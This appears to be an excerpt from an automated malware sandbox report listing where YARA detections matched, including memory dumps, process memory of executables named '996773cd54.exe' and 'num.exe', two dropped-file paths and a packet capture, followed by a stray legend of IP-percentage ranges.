Source: Yara match File source: 0000001A.00000002.2876408637.000000000087E000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2813065067.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2876347937.0000000000861000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.2857907960.0000000000861000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.3066029603.0000000000861000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2771688785.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3000201409.000000000067B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.3084290708.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3005019658.0000000000CD1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.2857985543.000000000087E000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 996773cd54.exe PID: 5644, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 6788, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 996773cd54.exe PID: 3960, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 5680, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs